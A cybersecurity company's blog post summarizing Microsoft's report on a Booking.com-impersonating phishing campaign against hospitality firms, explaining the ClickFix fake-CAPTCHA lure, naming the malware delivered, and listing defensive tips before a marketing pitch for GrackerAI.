Phishing Campaign Impersonates Booking.com

Deepak Gupta
Deepak Gupta

Co-founder/CEO

 
April 22, 2025
3 min read

Starting in December 2024, Microsoft Threat Intelligence identified a phishing campaign that impersonates the online travel agency Booking.com. This campaign targets organizations in the hospitality sector, employing a social engineering technique known as ClickFix to deliver credential-stealing malware. As of February 2025, this campaign remains active. The phishing attack specifically targets individuals in hospitality organizations across North America, Oceania, and Europe. Attackers send fake emails that appear to come from Booking.com, prompting users to address negative guest reviews or verify accounts. A screenshot of a email

Image courtesy of Microsoft Security Blog In the ClickFix technique, users are presented with false error messages instructing them to copy, paste, and execute commands. This interaction can bypass standard security features. The phishing emails lead to a fake webpage that mimics Booking.com, displaying a CAPTCHA designed to trick users into executing malicious commands. A screenshot of a fake Booking.com webpage
Image courtesy of Microsoft Security Blog The malicious code, executed via mshta.exe, downloads a variety of malware, including XWorm, Lumma stealer, and AsyncRAT, all capable of stealing financial data and credentials.

Recommendations for Defense

Organizations can mitigate the impact of phishing campaigns by educating users to recognize these threats:

  • Verify the sender’s email address.
  • Contact the service provider directly for suspicious messages.
  • Be cautious of urgent calls to action.
  • Hover over links to check the full URL.
  • Look for typos in the email content, which can be indicators of phishing.

For enhanced security, Microsoft recommends implementing phishing-resistant authentication methods and enforcing multi-factor authentication (MFA) across all accounts.

Malware Types Involved

The phishing campaign delivers various malware families:

  • XWorm: A remote access trojan that allows the attacker to take control of the victim's device.
  • Lumma Stealer: Focused on stealing sensitive information.
  • AsyncRAT: A remote access trojan known for its ability to capture keystrokes and access files.

Microsoft Defender Antivirus detects these threats as follows:

ClickFix Technique Explained

The ClickFix technique is a sophisticated method used in this phishing campaign. Users are misled into executing malicious commands by following instructions embedded in fake CAPTCHA pages. A screenshot of a contact us

Image courtesy of Microsoft Security Blog When users copy and paste the commands into the Windows Run dialog, it can lead to the installation of various malware types. This tactic shows the evolving nature of phishing attacks and highlights the need for robust cybersecurity measures.

Implications for Cybersecurity Marketing

For companies in the cybersecurity sector, such as GrackerAI, there is a significant opportunity to address these emerging threats through targeted content marketing and threat monitoring. By leveraging insights from such phishing campaigns, GrackerAI can help organizations create relevant marketing materials and educate their audiences on the latest cybersecurity threats. GrackerAI is an AI-powered cybersecurity marketing platform designed to assist organizations in transforming security news into strategic content opportunities. It enables marketing teams to identify emerging trends, monitor threats, and produce technically relevant content that resonates with cybersecurity professionals. Explore our services at GrackerAI to enhance your cybersecurity marketing strategy.

Latest Cybersecurity Trends & Breaking News

Critical Vulnerability in Erlang/OTP SSH Implementation Automating Cybersecurity in Software Development with AI

Deepak Gupta
Deepak Gupta

Co-founder/CEO

 

Deepak Gupta is a technology leader with deep experience in enterprise software, identity systems, and security-focused platform architecture. Having led CIAM and authentication products at a senior level, he brings strong expertise in building scalable, secure, and developer-ready systems. At Gracker, his work focuses on applying AI to simplify complex technical workflows while maintaining the accuracy, reliability, and trust required in cybersecurity and B2B environments.

Related Articles

The Architecture of Retrieval: Overcoming "Vector Displacement" in Generative Search
Fix drop in AI citations

The Architecture of Retrieval: Overcoming "Vector Displacement" in Generative Search

Recover from 0% AI search visibility with our technical guide on Vector Displacement and RAG optimization. Learn how Gracker AI realigns brand entities for high-confidence citations in SearchGPT, Perplexity, and Gemini

By David Brown May 25, 2026 3 min read
common.read_full_article
AEO vs SEO: Why B2B SaaS Companies Need Both in 2026
AEO SEO B2B SaaS

AEO vs SEO: Why B2B SaaS Companies Need Both in 2026

Stop choosing between SEO and AEO. Learn why B2B SaaS companies need the Search Triad—SEO, AEO, and GEO—to dominate AI-driven search results in 2026.

By David Brown May 22, 2026 6 min read
common.read_full_article
Algorithmic Competitor Analysis: How to Reverse-Engineer Your Competitors' AI Visibility
AI competitor analysis

Algorithmic Competitor Analysis: How to Reverse-Engineer Your Competitors' AI Visibility

Stop losing to AI search. Learn how to reverse-engineer competitor AI visibility, track brand mentions in LLMs, and dominate the new Answer Engine era.

By Ankit Agarwal May 21, 2026 6 min read
common.read_full_article
AI Can Optimize Operations-But Branding Still Wins Customers
AI business operations

AI Can Optimize Operations-But Branding Still Wins Customers

Discover why AI can optimize operations, but strong branding still wins customer trust, loyalty, and long-term business growth.

By Vijay Shekhawat May 21, 2026 6 min read
common.read_full_article